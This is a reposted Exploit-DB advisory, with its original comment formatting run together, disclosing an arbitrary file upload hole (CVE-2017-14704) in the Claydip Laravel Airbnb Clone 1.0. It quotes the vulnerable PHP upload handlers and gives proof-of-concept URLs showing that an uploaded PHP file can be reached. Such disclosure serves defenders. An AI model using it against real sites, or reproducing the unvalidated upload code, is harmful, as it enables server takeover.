Claydip Airbnb Clone 1.0 – Arbitrary File Upload

• Exploit Database
• 119 阅读

• 作者： Ihsan Sencan
  日期： 2017-09-22
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/42773/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74

  # # # # # # Exploit Title: Claydip Laravel Airbnb Clone 1.0 - Arbitrary File Upload # Dork: N/A # Date: 22.09.2017 # Vendor Homepage: https://www.claydip.com/ # Software Link: https://www.claydip.com/airbnb-clone.html # Demo: https://www.claydip.com/airbnb_demo.html # Version: N/A # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-14704 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # # The vulnerability allows an users upload arbitrary file.... # # Vulnerable Source: # # .............1 #public function imageSubmit(Request $request) #{ $this->validate($request, [ 'image' => 'image|mimes:jpeg,png,jpg,gif,svg|max:2048', ]); #if ($request->hasFile('profile_img_name')) { #$file = $request->file('profile_img_name'); #//getting timestamp #$timestamp = str_replace([' ', ':'], '-', Carbon::now()->toDateTimeString()); #$img_name = $timestamp. '-' .$file->getClientOriginalName(); #//$image->filePath = $img_name; #$file->move(public_path().'/images/profile', $img_name); #$postData = array('profile_img_name' => $img_name, 'profile_photo_approve' => 0); #$user = $this->userRepository->updateUser($postData); #flash('Profile Image Updated Successfully', 'success'); #if($request->get('uploadpage') == 2) { #return \Redirect::to('user/edit/uploadphoto'); #} #return \Redirect::to('user/dashboard'); #} # #} # .............2 #public function proof_submit(Request $request) #{ #if ($request->hasFile('profile_img_name')) { #$file = $request->file('profile_img_name'); #//getting timestamp #$timestamp = str_replace([' ', ':'], '-', Carbon::now()->toDateTimeString()); #$img_name = $timestamp. '-' .$file->getClientOriginalName(); #//$image->filePath = $img_name; #$file->move(public_path().'/images/proof', $img_name); #$postData = array('idproof_img_src' => $img_name, 'id_proof_approved' => 0); #$user = $this->userRepository->updateUser($postData); #flash('Proof Updated Successfully', 'success'); #return \Redirect::to('user/edit/uploadproof'); #} # #} # ............. # # Proof of Concept: # # http://localhost/[PATH]/user/edit/uploadphoto # http://localhost/[PATH]/user/edit/uploadproof # # http://localhost/[PATH]/images/profile/[$timestamp].Php # # Etc.. # # # # #